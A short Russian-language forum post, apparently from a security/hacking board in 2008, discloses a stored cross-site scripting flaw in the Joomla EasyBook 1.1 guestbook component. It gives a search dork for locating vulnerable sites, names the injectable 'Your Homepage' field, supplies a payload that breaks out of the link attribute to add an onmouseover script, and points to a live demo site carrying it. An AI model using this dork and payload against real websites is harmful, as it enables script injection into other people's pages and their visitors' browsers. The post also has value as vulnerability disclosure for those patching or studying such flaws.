
26.02.2008, 13:55
|
|
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме: 4038468
Репутация:
1224
|
|
Component EasyBook 1.1 Active XSS
inurl: index.php?option=com_easybook
Инъекция:
Код:
При добавлении сообщения уязвимо поле "Ваш сайт:/Your Homepage:". вписываем: http://www.com/" onmouseover=javascript:alert(/XSS/);> и добавляем сообщение.
Пример: http://demo.easy-joomla.org/index.php?option=com_easybook&Itemid=5
Никнейм Hi!, наводим курсор на ссылку
|
|
|